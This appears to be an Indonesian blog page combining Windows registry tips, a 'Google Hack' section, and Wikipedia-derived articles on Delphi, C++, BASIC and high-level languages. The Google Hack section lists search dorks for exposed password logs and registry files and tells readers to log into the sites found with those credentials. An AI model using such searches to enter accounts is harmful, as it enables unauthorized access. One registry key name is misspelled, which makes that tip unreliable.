19. Save CPU Time
Sebuah PC standar biasanya memiliki beberapa program yang ingin menggunakan kapasitas prosesor pada saat yang bersamaan, dan Windows akan mengalokasi setiap periode dari CPU time sebuah "quantum" sebuah berpindah ke program yang berikutnya. Secara default, biasanya ini sangat pendek, sehingga PC akan menjadi responsif, tapi terkadang hal ini berarti Windows akan membuat waktu untuk berpindah di antara proses-proses tersebut.

Solusinya? Anda bisa mencoba apa yang Windows Server lakukan. Atur sistem untuk menggunakan quantem yang lebih lama. Atur "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl\Win32PrioritySepartion" menjadi 16 (hex).

Quantum yang lebih lama berarti pergantian yang lebih sedikit di antara program jadi lebih sedikit waktu yang terbuang. Anda bisa memperhatikan kalau lag pada game atau pemutaran video akan menjadi lebih halus. Tapi, jika Anda menemukan masalah lainnya, cukup kembalikan nilai Win32PrioritySeparation menjadi nilai orisinilnya yaitu 26.

20. Non-aktifkan AutoRun
Fitur AutoRun milik Windows merupakan salah satu risiko keamanan yang berpotensi karena ia menjalankan kode secara otomatis ketika Anda menyambungkan alat yang bersifat removable ke dalam PC. Jika memang, hal tersebut bisa diatur secara manual saja, maka akan lebih aman untuk mematikan fitur tersebut.

Pada beberapa sistem, hal tersebut hanya bisa dilakukan melalui Registry. Masuklah ke "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\IniFileMapping" dan buat tombol yang bernama "Autorun.inf".

Kemudian, klik-ganda pada nilai defaultnya dan masukkan "@SYS:DoesNotExist". Kemudian hapus "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2". Sekarang, Windows tidak lagi menjalankan kode apapun pada CD, DVD, atau portable drive secara otomatis. Anda harus menjalankannya secara manual.

Google Hack

Mendapatkan Password dari Berkas Log

Keyword untuk melakukan hacking jumlahnya cukup banyak dengan tingkat kesulitan tertentu. Untuk mendapatkan password secara langsung sebenarnya banyak cara yang bisa dilakukan, seperti mencari dari berkas log, list password dan banyak lagi. Okey, kali ini kita akan mencobanya dulu mendapatkan user name dan password dengan menggunakan berkas log. Untuk situs-situs yang tingkat security lemah cara ini akan sangat ampuh, tapi jangan coba-coba untuk melakukan hal yang tidak baik. Berikut adalah langkah-langkah untuk melakukan google hacking dengan memanfaatkan keyword berkas log :
1. Masuk ke alamat situs google : http://www.google.com. (bukan http://www.google.co.id)
2. Pada kotak search google masukan keyword berikut ini : inurl : password.log filetype :log
keterangan :
inurl :password.log ==> digunakan untuk mencari url atau alamat yang relepan.
filetype: log ==> digunakan untuk mencari secara spesifik file yang bertiPe log.
3. Jika sudah mengetikan keyword tersebut tekan Enter. baca seluruh keterangannya
4. Cobalah untuk masuk ke situs tersebut, dan coba memasukan user name dan passwordnya. Jika berhasil, selamat Anda berhasil menjebol passwordnya. Tapi ingat jangan digunakan untuk hal-hal yang tidak baik.



Mendapatkan Username dari Registry

Google juga memiliki kemampuan untuk mendapatkan password dengan menggunakan registry yang biasanya menyimpan informasi penting. Registry tersebut biasanya disimpan dalam mesin web tersebut. Berikut langkah-langkah untuk mencari user name dengan registry :
1. Masuk ke alamat situs google : http://www.google.com.
2. Pada kotak search google masukan keyword berikut ini :
filetype:reg reg HKEY_CURRENT_USER username
Keterangan :
Keyword ini digunakan untuk memerintahkan google mencari file bertipe reg (Regedit) dengan path HCU(Hkey_Current_User) username
3. Jika sudah mengetikan keyword tersebut tekan Enter

Delphi

Delphi adalah sebuah bahasa pemrograman dan lingkungan pengembangan perangkat lunak. Produk ini dikembangkan oleh CodeGear sebagai divisi pengembangan perangkat lunak milik Embarcadero, divisi tersebut sebelumnya adalah milik Borland. Bahasa Delphi, atau dikenal pula sebagai object pascal (pascal dengan ekstensi pemrograman berorientasi objek (PBO/OOP)) pada mulanya ditujukan hanya untuk Microsoft Windows, namun saat ini telah mampu digunakan untuk mengembangkan aplikasi untuk Linux dan Microsoft .NET framework (lihat di bawah). Dengan menggunakan Free Pascal yang merupakan proyek opensource, bahasa ini dapat pula digunakan untuk membuat program yang berjalan di sistem operasi Mac OS X dan Windows CE

Pada tanggal 8 Februari 2006, Borland mengumumkan akan melepas seluruh jajaran produk pengembangan aplikasi komputernya termasuk di antaranya Delphi. [1]. Saat ini Delphi menjadi bagian dari jajaran IDE milik Embarcadero Technologies setelah Embarcadero Technologies mengakuisisi CodeGear, anak perusahaan Borland yang menangani tool pengembangan aplikasi.



Lingkungan pengembangan

Umumnya delphi lebih banyak digunakan untuk pengembangan aplikasi desktop dan enterprise berbasis database, tapi sebagai perangkat pengembangan yang bersifat general-purpose ia juga mampu dan digunakan dalam berbagai jenis proyek pengembangan software. Ia juga yang dikenal sebagai salah satu yang membawa istilah RAD tool, kepanjangan dari Rapid Application Development, saat dirilis tahun 1995 untuk windows 16-bit. Delphi 2, dirilis setahun kemudian, mendukung lingkungan windows 32-bit, dan versi c++, C++Builder, dirilis beberapa tahun kemudian. Pada tahun 2001 sebuah versi linux yang dikenal sebagai Kylix tersedia. Dengan satu rilis baru setiap tahunnya, pada tahun 2002 dukungan untuk Linux (melalui Kylix dan CLX component library) ditambahkan dan tahun 2003 .NET mulai didukung dengan munculnya Delphi.Net (Delphi 8).

Chief Architect yang membidani Delphi, dan pendahulunya Turbo Pascal, adalah Anders Hejlsberg sampai kemudian ia pindah ke Microsoft tahun 1996 di mana ia sebagai chief designer C# dan termasuk orang kunci dalam perancangan Microsoft .Net Framework. Dukungan penuh untuk .Net ditambahkan pada Delphi 8 (dirilis pada bulan Desember 2003) dengan penampilan user interface (look and feel) mirip dengan Microsoft Visual Studio .NET.

Delphi 2005 (nama lain dari Delphi 9) mendukung code generation baik untuk win32 maupun .NET, dan seperti yang telah dikenal, fitur-fitur manipulasi data secara live dari database secara design-time. Ia juga membawa banyak pembaruan pada IDE secara signifikan.

Para penganjur delphi mengklaim dengan bahasa pemrograman Delphi, IDE dan component library (VCL/CLX) yang disediakan oleh vendor tunggal memungkinkan satu paket yang lebih konsisten dan mudah dikenali.

Produk delphi ini didistribusikan dalam beberapa rancangan: Personal, Professional, Enterprise (sebelumnya Client/Server) dan Architect.



Bahasa pemrograman

Perbedaan fitur yang utama antara Delphi, Kylix dengan IDE-IDE yang lain adalah keberadaan bahasanya (Bahasa pemrograman delphi), VCL/CLX (Visual Component Library), Penekanan konektifitas database yang sangat baik, dan banyaknya komponen-komponen pihak ketiga yang mendukungnya.

Aspek penting yang perlu dicatat tentang Bahasa pemrograman Delphi termasuk:

* Penanganan object sebagai reference/pointer secara transparan
* Properti sebagai bagian dari bahasa tersebut; benar, sebagai getter dan setter (atau accessor and mutator), yang secara transparan mengenkapsulasi akses pada field-field anggota dalam kelas tersebut.
* Property index dan Default yang menyediakan akses pada data kolektif
* Pendelegasian (type safe method pointer) yang digunakan untuk memproses event yang dipicu oleh component
* Pendelegasian implementasi interface pada Field ataupun property dari class.
* Implementasi penanganan windows message dengan cara membuat method dalam class dengan nomer/nama dari windows message yang akan dihandle.
* COM bersifat sebagai interface yang independen dengan implementasi class sebagai reference counted
* Kompilasi yang dapat menghasilkan kode yang berjalan secara native x86 ataupun managed code pada arsitektur framework .NET.




Pro and kontra

Delphi membawa keuntungan-keuntungan berikut:

* Komunitas pengguna yang besar pada Usenet maupun web [2]
* Dapat mengkompilasi menjadi single executable, memudahkan distribusi dan meminimalisir masalah yang terkait dengan versioning
* Banyaknya dukungan dari pihak ketiga terhadap VCL (biasanya tersedia berikut source codenya) ataupun tools pendukung lainnya (dokumentasi, tool debugging)
* Optimasi kompiler yang cukup cepat
* Mendukung multiple platform dari source code yang sama

Berikut ini kerugiannya:

* Partial single vendor lock-in (Borland dapat menetapkan standar bahasa, kompatibilitas yang harus mengikutinya)
* Terbatasnya kamampuan portabilitas antar-platform OS (sebelum ada kylix)
* Akses pada platform dan library pihak ketiga membutuhkan file-file header yang diterjemahkan ke dalam bahasa pascal
* Dokumentasi atas platform dan teknik-teknik yang menyertainya sulit ditemukan dalam bahasa pascal (contoh akses COM dan Win32)


Klon dan alternatifnya

Meskipun tidak bersifat subsitutif penuh terhadap keseluruhan paket delphi, ada beberapa usaha yang dilakukan untuk membuat kompatibilitas bahasa ini menjadi lebih baik atu bahkan lebih buruk dengan membuat kode delphi yang tidak bisa dicapai oleh delphi ataupun kylix sendiri.

Produk-produk berikut bisa membuat kode delphi berjalan dalam alur yang tidak mungkin dilakukan oleh Delphi (seperti dukungan terhadap sistem operasi yang berbeda, distribusi yang gratis dan penggunaan untuk kebutuhan pendidikan, dan penyertaan kode dari kompilernya sendiri) yang menjadikan vendor bisa menjadi lebih independen. Produk-produk berikut ini umumnya digunakan untuk kebutuhan edukasi dan mengusahakan agar sisi aplikasi delphi yang berjalan pada server bisa berjalan pada sistem operasi alternatif selain dari yang didukung oleh delphi/kylix, umumnya produk tersebut sudah mensupport linux sebelum kylix muncul.

* Bloodshed Dev-Pascal Salah satu IDE Win32 yang mensupport GNU Pascal maupun Free Pascal
* Free Pascal Kompiler berbasis commandline dengan dialek yang sangat dekat dengan Turbo Pascal dan Delphi. Fitur yang terdapat pada Delphi versi 4 ke atas hanya diimplementasikan pada seri versi 1.9.x (akan menjadi seri 2.0.x). Versi beta ini sudah bisa digunakan secara baik. Beroperasi umumnya pada sistem operasi berbasis x86. Mendukung Linux, Mac OS dan Mac OS X (termasuk implementasi Xcode) pada keluarga PowerPC, dan Linux berbasis AMD64. SPARC and arsitektur Mesin RISC Acorn (ARM) masih sedang dikerjakan dan belum siap dideploy.
* GNU Pascal secara terpisah didistribusikan sebagai bagian dari GNU Compiler Collection dan tidak mendukung dialek pascal yang diimplementasikan borland
* InnerFuse merupakan interpreter bahasa Delphi yang dapat diintegrasikan dengan aplikasi Delphi
* Lazarus merupakan satu upaya untuk membangun sebuah RAD berbasis Free Pascal.
* OpenSibyl
* Virtual Pascal
* WDOSX
* Winsoft Pocket Studio



Courtessy of Wikipedia.com

C++

C++ adalah salah satu bahasa pemrograman komputer. Dibuat pada tahun 1980-an oleh Bell Labs (Bjarne Stroustrup) sebagai pengembangan dari Bahasa pemrograman C. Salah satu perbedaan yang paling mendasar dengan bahasa C adalah dukungan terhadap konsep pemrograman berorientasi objek (Object Oriented Programming).



Program C++ pertama

Contoh program sederhana C++ untuk hello world dengan menggunakan Pustaka Dasar C++ dapat dilihat di bawah ini:

#include // provides std::cout

int main()
{
std::cout << "Hello, world!\n";
return 0;
}



Kata yang dipesan

*pertama

C++ mempunyai 32 buah kata yang dipesan (reserved words). Kata kunci kelompok pertama merupakan turunan dari bahasa C, di antaranya:
auto const double float int short struct unsigned
break continue else for long signed switch void
case default enum goto register sizeof typedef volatile
char do extern if return static union while


*Kelompok kedua

Kata yang dipesan kelompok kedua berjumlah 30. Kata-kata ini adalah baru dan hanya ada di bahasa C++.
asm dynamic_cast namespace reinterpret_cast try
bool explicit new static_cast typeid
catch false operator template typename
class friend private this using
const_cast inline public throw virtual
delete mutable protected true wchar_t

Kata-kata yang dipesan tersebut di atas tidak boleh dipakai sebagai nama variable, class, enum, macro, dan struct.


*Tipe data dasar

Untuk menyimpan suatu variabel diperlukan tempat khusus di dalam memori komputer. Besar dan tipe dari variabel-variabel di dalam standar program C++ dispesifikasikan sebagai berikut.
Nama Keterangan Ukuran Jangkauan
char Abjad/karakter atau untuk bilangan bulat kecil 1 byte signed: -128 to 127

unsigned: 0 to 255
short int (short) Bilangan bulat dengan jangkauan pendek 2 byte signed: -32768 to 32767

unsigned: 0 to 65535
int Bilangan bulat 4 byte signed: -2147483648 to 2147483647

unsigned: 0 to 4294967295
long int (long) Integer dengan jangkauan panjang 4 byte signed: -2147483648 to 2147483647

unsigned: 0 to 4294967295
bool Boolean, dapat bernilai benar atau salah (true or false) i byte true or false
float Angka dengan titik mengambang (bilangan cacah) 4 byte 3.4e +/- 38 (7 digit)
double Bilangan cacah dengan ketelitian ganda 8 byte 1.7e +/- 308 (15 digits)
long double Bilangan cacah dengan ketelitian ganda panjang 8 byte 1.7e +/- 308 (15 digits)
wchar_t Karakter lebar, biasa dipakai untuk Unicode karakter 2 byte 1 karakter lebar


Daftar C++ compiler

Untuk mengubah kode-kode C++ program menjadi suatu program aplikasi yang dimengerti oleh sistem operasi dan komputer, diperlukan sebuah kompilator C++. Berikut ini adalah beberapa kompilator C++ yang dapat digunakan secara gratis.

* Microsoft Visual C++ 2005 Express
* Turbo C++ Explorer
* Apple Xcode for Mac OS X
* Open Source Watcom / OpenWatcom C/C++ Compiler
* Digital Mars C/C++ Compiler (Symantec C++ Replacement)
* Bloodshed Dev-C++ C++ Compiler
* Free Microsoft .NET Framework Software Development Kit (SDK) / Free Microsoft Visual C++ Compiler
* Intel C++ Compiler for Linux Non-Commercial Version
* Sun Studio Compilers and Tools
* Open64 Compiler Tools
* Apple's Macintosh Programmer's Workshop (C and C++ compilers)
* TenDRA C/C++ Compiler
* GNU C/C++ Compiler
* Ch Embeddable C/C++ Interpreter (Standard Edition)
* DJGPP C and C++ Compilers
* CINT C and C++ Interpreter
* SDCC C Cross-compiler
* Cygwin Project (C & C++ Compilers)
* SDCC C Cross-compiler
* Code::Blocks



Courtessy of Wikipedia.com

BASIC

BASIC, adalah singkatan dari Beginners’ All-purpose Symbolic Instruction Code adalah sebuah kelompok bahasa pemrograman tingkat tinggi. Secara harfiah, BASIC memiliki arti "kode instruksi simbolis semua tujuan yang dapat digunakan oleh para pemula". Memang, istilah "Bahasa BASIC" di sini juga bisa diartikan menjadi bahasa untuk pemula, atau dengan kata lain, disebut sebagai bahasa dasar, tapi hal tersebut dirasa kurang tepat, mengingat BASIC dapat juga digunakan oleh para pemrogram ahli.

BASIC pertama kali dikembangkan pada tahun 1963 oleh John George Kemeny dan Thomas Eugene Kurtz yang berasal dari Dartmouth College, untuk mengizinkan akses terhadap komputer bagi para mahasiswa jurusan selain jurusan ilmu eksakta. Pada waktu itu, hampir semua komputer membutuhkan perangkat lunak, dan waktu itu belum ada perangkat lunak yang dijual secara bebas, sehingga hanya orang-orang tertentulah yang dapat menggunakan komputer, yakni para matematikawan dan ilmuwan, karena mereka dapat membangun perangkat lunak sendiri. Bahasa BASIC, setelah diciptakan menjadi menjamur dan banyak dimodifikasi. Bahasa BASIC menjadi bahasa yang paling populer digunakan pada komputer mikro pada akhir tahun 1970-an dan komputer rumahan pada tahun 1980-an. Dan hingga saat ini, menjadi bahasa yang dialeknya beberapa kali berevolusi.




Sejarah

Sebelum pertengahan tahun 1960-an, komputer merupakan barang yang sangat mahal dan hanya digunakan untuk tugas-tugas tujuan khusus. Pada saat itu, jenis pemrosesan yang dapat dilakukan adalah batch processing, yang artinya komputer hanya dapat melakukan pemrosesan satu pekerjaan pada satu waktu, dan pekerjaan lainnya akan dilakukan setelah pekerjaan lainnya selesai. Akan tetapi, selama tahun 1960-an, muncullah komputer yang lebih cepat dan lebih terjangkau. Dengan kemampuan pemrosesan yang lebih kuat ini, komputer pun kadang-kadang "menganggur", tanpa ada pekerjaan yang ia lakukan sama sekali. Bahasa pemrograman di dalam era batch programming pun didesain untuk tujuan-tujuan khusus, seperti halnya mesin di mana mereka berjalan, seperti halnya kalkulasi formula ilmiah atau pemrosesan data bisnis atau hanya untuk penyuntingan teks.

Seiring dengan turunnya harga komputer, penggunaan komputer pun tidak lagi terbatas pada riset-riset ilmiah dan militer, tetapi merambah kepada penggunaan komersial. Sistem-sitem komputer yang lebih baru mendukung konsep time-sharing, sebuah cara di mana sebuah sistem mengizinkan beberapa pengguna atau proses untuk menggunakan CPU dan memori. Dalam sistem tersebut, sistem operasi akan menggilir proses-proses yang sedang berjalan, dan mengizinkan setiap proses untuk dijalankan oleh CPU (serta disimpan di dalam memori), sebelum pindah ke proses selanjutnya. Mesin-mesin tersebut telah menjadi cukup cepat sehingga kebanyakan pengguna saat itu dapat merasakan seolah-olah mereka menggunakan mesin tersebut hanya untuk sendiri. Secara teori, time-sharing mampu mengurangi biaya komputasi secara signifikan, mengingat sebuah mesin dapat digunakan oleh beberapa pengguna, bahkan ada yang mencapai angka ratusan pengguna.



Era komputer mini

Bahasa BASIC yang asli didesain pada tahun 1963 oleh John Kemeny dan Thomas Kurtz dan diimplementasikan oleh sekelompok siswa di Dartmouth College di bawah arahan mereka berdua. BASIC didesain untuk para siswa agar mereka dapat menulis program untuk Dartmouth Time-Sharing System. Bahasa tersebut didesain untuk mengatasi masalah kerumitan yang terjadi pada bahasa-bahasa pemrograman yang sudah lama, dengan sebuah desain bahasa yang baru yang memang dikhususkan untuk kelas baru yang di dalamnya terdapat para pengguna mesin tersebut, yakni para pengguna yang kurang begitu memahami masalah keteknikan dan juga tidak memiliki latar belakang matematika, dan kurang berminat untuk menekuni bidang matematika. Dengan menggunakan komputer untuk mendukung proses pengajaran dan riset ternyata menarik perhatian banyak kalangan. Pada beberapa tahun kemudian, seiring dengan munculnya beberapa dialek bahasa BASIC lainnya, dialek BASIC buatan Kemeny dan Kurtz dinamakan dengan Dartmouth BASIC.

Prinsip-prinsip yang digunakan dalam mendesain bahasa BASIC antara lain:

1. Dapat digunakan secara mudah bagi para pemula.
2. Dapat digunakan sebagai sebuah bahasa pemrograman untuk tujuan umum (general purpose)
3. Dapat ditambahi fitur-fitur tambahan dan tingkat lanjut untuk para ahli, tetapi tetap mempertahankan kesederhanaan bahasa untuk para pemula.
4. Harus interaktif.
5. Pesan-pesan kesalahan harus jelas dan mudah dipahami.
6. Merespons dengan cepat untuk program-program yang kecil.
7. Tidak harus membutuhkan pengetahuan dan pemahaman perangkat keras komputer.
8. Pengguna juga tidak harus tahu mengenai sistem operasi.

Bahasa BASIC sendiri sebagian dibuat dengan berdasar pada FORTRAN II dan sebagian lagi berdasar pada ALGOL 60, dengan adanya tambahan agari ia cocok digunakan untuk time-sharing. Sebelum ada BASIC, di Dartmouth College sudah terdapat DARSIMCO (1956), dan DOPE (implementasi yang dilakukan pada tahun 1962 terhadap SAP) serta DART (1963 yang merupakan FORTRAN II yang disederhanakan). Awalnya, BASIC difokuskan untuk mendukung beberapa pekerjaan matematika dengan dukugan aritmetika matriks dari mulai awal implementasinya sebagai bahasa yang bertumpuk (batch language) untuk kemudian dikembangkan pada tahun 1965 dengan dukungan fungsionalitas string.

BASIC pertama kali diimplementasikan dalam mainframe General Electrics GE-265 yang mendukung banyak terminal. Pada awal perkenalannya, BASIC merupakan bahasa yang dikompilasi, bukan bahasa yang diinterpretasikan, seperti yang dipercaya selama ini oleh banyak orang. BASIC juga sangat efisien, dengan mengalahkan FORTRAN II dan ALGOL 60 di mesin yang sama pada beberapa program matematika, seperti operasi Hukum Simpson.

Para pengembang bahasa BASIC memutuskan bahwa kompilator bahasa BASIC harus tersedia tanpa pungutan biaya sehingga bahasa BASIC dapat berkembang secara luas. Selain itu, mereka juga mendistribusikan BASIC ke sekolah-sekolah menengah atas di Dartmouth selain Dartmouth College, dan juga mempromosikannya. Hasilnya, pengetahuan tentang BASIC menjadi relatif meluas (untuk sebuah bahasa pemrograman), dan BASIC pun akhirnya diimplementasikan oleh banyak pengembang, sehingga menjadi sebuah bahasa pemrograman yang populer untuk komputer mini yang baru seperti seri Programmable Data Processor (PDP) milik Digital Equipment Corporation dan Nova milik Data General. Bahasa BASIC pun juga digunakan di dalam HP Time-Shared BASIC System pada tahun-tahun akhir 1960-an dan awal 1970-an. Pada komputer-komputer tersebut, bahasa BASIC cenderung diimplementasikan sebagai interpreter, bukannya sebagai kompilator.

Beberapa tahun setelah dirilis, beberapa profesional di bidang komputer, terutama Edsger W. Dijkstra, mengutarakan pendapat mereka mengenai penggunaan statemen GOTO, yang tersedia di dalam banyak bahasa pemrograman, termasuk di antaranya BASIC, ternyata membuat praktek pemrograman menjadi buruk[1]. Beberapa bahkan mengeluhkan bahwa bahasa BASIC terlalu lambat (sebagian besar versi BASIC yang diinterpretasikan memang jauh lebih lambat dibandingkan dengan versi yang dikompilasi) atau terlalu sederhana (beberapa versi, terutama untuk komputer-komputer dengan kemampuan yang kecil membuang banyak fitur dan kemampuan yang penting.


Era Komputer rumahan

Bahasa BASIC tidaklah serta-merta diakui sebagai bahasa yang populer, meski digunakan pada banyak komputer mini, tetapi saat Micro Instrumentation Telemetry System (MITS) merilis Altair 8800 pada tahun 1975 yang di dalamnya telah terdapat BASIC, BASIC mulai menunjukkan peningkatan yang signifikan. Sebagian besar bahasa pemrograman membutuhkan memori yang lebih besar daripada yang dapat dibeli oleh kebanyakan orang, mengingat memang harga memori saat itu sangatlah mahal. Dengan akses yang lambat yang ditawarkan oleh tape, dan tidak adanya editor teks yang cocok, sebuah bahasa pemrograman seperti BASIC yang dapat melewati beberapa batasan tersebut ternyata sangat menarik. BASIC juga memiliki keunggulan, yakni terkenal oleh para desainer yang memiliki minat terhadap komputer mikro. Usaha Kemeny dan Kurtz yang dilakukan pada awal-awal pengembangan BASIC pun berbuah hasil. Salah satu implementasi bahasa BASIC yang pertama kali muncul untuk mesin dengan mikroprosesor Intel 8080 seperti yang digunakan oleh Altair 8800 adalah Tiny BASIC, sebuah implementasi BASIC yang aslinya ditulis oleh Dr. Li-Chen Wang untuk kemudian ditulis ulang agar dapat berjalan di atas Altair oleh Dennis Allison berdasarkan permintaan dari Bob Albrecht (yang kemudian mendirikan Dr. Dobb's Journal). Kode sumber secara penuh dan desain Tiny BASIC tersedia dan dipublikasikan pada tahun 1976 pada jurnal Dr. Dobb's Journal.

Pada tahun 1975, MITS merilis Altair BASIC, yang dikembangkan oleh William Henry Gates III dan Paul Allen dari Micro-Soft. Versi Altair pertama kali dikembangkan secara bersama-sama oleh Gates, Allen dan Monte Davidoff. Versi Microsoft BASIC pun kemudian segera muncul di beberapa platform komputer mikro lainnya dengan dengan menggunakan lisensi, dan kemudian jutaan salinan pun terjual; Microsoft BASIC pun menjadi bahasa standar yang digunakan oleh komputer Apple II (yang menggunakan MPU Mostek 6502). Hingga tahun 1979, Microsoft pun berbicara dengan beberapa vendor komputer mikro, termasuk di antaranya adalah IBM, mengenai lisensi interpreter bahasa BASIC untuk komputer yang mereka bangun. Sebuah versi pun dimasukkan ke dalam chip ROM dalam IBM PC, sehingga komputer PC tanpa disket floppy akan dapat memulai langsung sesi pemrograman BASIC seperti halnya komputer mikro lainnya.

Beberapa perusahaan baru pun mencoba mengikuti jejak-jejak sukses MITS, IMSAI, North Star dan Apple sehingga membuat sebuah industri komputer rumahan sendiri; sementara itu, BASIC telah menjadi fitur standar dari semua komputer rumahan tapi sebagian kecil komputer rumahan memang tidak memilikinya. Sebagian besar komputer rumahan datang dengan interpreter bahasa BASIC di dalam ROM, sehingga pembelian disket yang cukup mahal pun menjadi tidak perlu dilakukan lagi. Beberapa saat kemudian, ternyata mesin yang menjalankan varian-varian BASIC di seluruh dunia sudah menjadi sangat banyak, bahkan jumlahnya lebih besar dibandingkan dengan pengguna semua bahasa pemrograman, meski semuanya digabungkan. Dialek yang digunakan oleh BASIC pada zaman ini juga sedikit berbeda dari satu implementasi dengan implementasi lainnya. Tetapi, sebagian besar komputer yang beredar pada tahun 1980-an memiliki interpreter bahasa BASIC yang disimpan di dalam ROM.

Kemudian BBC pun menerbitkan BBC BASIC, sebuah versi bahasa BASIC yang dikembangkan oleh Acorn Computers, Ltd untuk BBC, yang memasukkan beberapa peningkatan tambahan seperti halnya pembuatan struktur terhadap kata kunci, dan juga akses secara langsung terhadap sistem operasi. Selain itu, varian ini juga memiliki assembler yang terintegrasi. BBC BASIC memang diakui sebagai sebuah dialek BASIC yang bagus, dan kemudian lebih dari 30 platform lainnya selain komputer mikro BBC pun mengadopsinya.


Contoh progam

Berikut ini adalah contoh program yang ditulis dalam bahasa Visual BASIC

Private Sub Command1_Click()
Dim a, b As Integer
a = txt1.Text
b = txt2.Text
txt3.Text = a + b
txt4.Text = a / b
txt5.Text = a - b
txt6.Text = a * b
txt7.Text = a ^ b
End Sub

Private Sub Command2_Click()
txt1.Text = ""
txt2.Text = ""
txt3.Text = ""
txt4.Text = ""
txt5.Text = ""
txt6.Text = ""
txt7.Text = ""
End Sub

Private Sub Command3_Click()
End
End Sub





Courtessy of Wikipedia.com

Bahasa Tingkat Tinggi

Bahasa pemrograman tingkat tinggi adalah sebuah bahasa pemrograman yang jika dibandingkan dengan bahasa pemrograman tingkat rendah memiliki sifat lebih mudah digunakan, lebih portabel (mudah diadaptasikan) antar-platform, dan lebih abstrak. Bahasa-bahasa semacam ini sering melakukan abstraksi terhadap beberapa operasi CPU, seperti halnya pengaksesan memori.


Fitur-fitur Bahasa pemrograman tingkat tinggi

Istilah "bahasa pemrograman tingkat tinggi" tidak serta merta menjadikan bahasa tersebut lebih baik dibandingkan dengan bahasa pemrograman tingkat rendah. Akan tetapi, maksud dari "tingkat tinggi" di sini merujuk kepada abstraksi yang lebih tinggi dibandingkan dengan bahasa tingkat rendah terhadap bahasa mesin. Dibandingkan dengan harus berurusan dengan register, alamat memori dan stack-stack panggilan, bahasa pemrograman tingkat tinggi akan berurusan dengan variabel, larik, dan ekspresi aritmetika atau aljabar Boolean. Selain itu, tidak seperti bahasa rakitan, bahasa tingkat tinggi tidak memiliki opcode atau kode operasi yang dapat secara langsung menjadikan bahasa tersebut menjadi kode mesin. Fitur lainnya seperti rutin-rutin penanganan string, fitur pemrograman berorientasi objek, input/output terhadap berkas juga terdapat di dalam jenis bahasa ini.

Secara umum, bahasa tingkat tinggi akan membuat pemrograman komputer yang kompleks menjadi lebih sederhana, sementara bahasa tingkat rendah cenderung untuk membuat kode yang lebih efisien. Dalam sebuah bahasa tingkat tinggi, elemen-elemen kompleks dapat dipecah ke dalam beberapa elemen yang lebih sederhana, meski masih dapat dianggap kompleks, di mana bahasa tersebut menyediakan abstraksi. Karena alasan ini, kode-kode yang harus berjalan dengan efisien dapat ditulis dalam bahasa pemrograman tingkat rendah, sementara bahasa tingkat tinggi digunakan untuk mempermudah pemrograman.

Akan tetapi, dengan bertambah rumitnya arsitektur mikroprosesor modern, kompilator-kompilator bahasa pemrograman tingkat tinggi dapat membuat kode yang lebih efisien dibandingkan dengan para programmer bahasa pemrograman tingkat rendah yang melakukannya secara manual.

Perlu dicatat bahwa istilah "tingkat tinggi" dan "tingkat rendah" adalah relatif. Pada awalnya, bahasa rakitan dianggap sebagai bahasa tingkat rendah, sementara COBOL, C, dan lain-lainnya dianggap sebagai bahasa tingkat tinggi, mengingat mereka mengizinkan abstraksi terhadap fungsi, variabel, dan evaluasi ekspresi. Akan tetapi, banyak programmer saat ini mungkin menganggap bahasa C sebagai bahasa pemrograman tingkat rendah, mengingat bahasa pemrograman tersebut mengizinkan akses memori secara langsung dengan menggunakan alamatnya, dan juga dapat menggunakan beberapa direktif bahasa rakitan.


Model eksekusi

Ada tiga buah model eksekusi untuk bahasa tingkat tinggi, yakni:

* Diinterpretasikan
Bahasa jenis ini akan dibaca dan dieksekusi secara langsung tanpa adanya proses atau tahap kompilasi oleh kompilator. Alat bantu yang mampu melakukannya disebut sebagai interpreter.
* Dikompilasi
Bahasa jenis ini akan ditransformasikan ke dalam bentuk yang dapat dieksekusi sebelum dijalankan. Ada dua jenis kompilasi yang sering digunakan, yakni:
o Intermediate representation
Ketika sebuah bahasa dikompilasi ke dalam intermediate representation, representasi tersebut dapat dioptimalkan atau disimpan untuk eksekusi pada lain waktu tanpa adanya kebutuhan untuk membaca lagi kode sumber program. Ketika representasi intermediate disimpan, umumnya, hal tersebut dinamakan dengan bytecode.
o Machine code generation
Beberapa bahasa dapat melakukan kompilasi secara langsung ke dalam bahasa mesin.
* Ditranslasikan
Sebuah bahasa juga dapat ditranslasikan ke dalam bahasa pemrograman tingkat rendah di mana kompilator kode bahasa asli telah beredar luas. Bahasa pemrograman C merupakan salah satu target yang umum untuk translator seperti ini.





Courtessy of Wikipedia.com
Powered By Blogger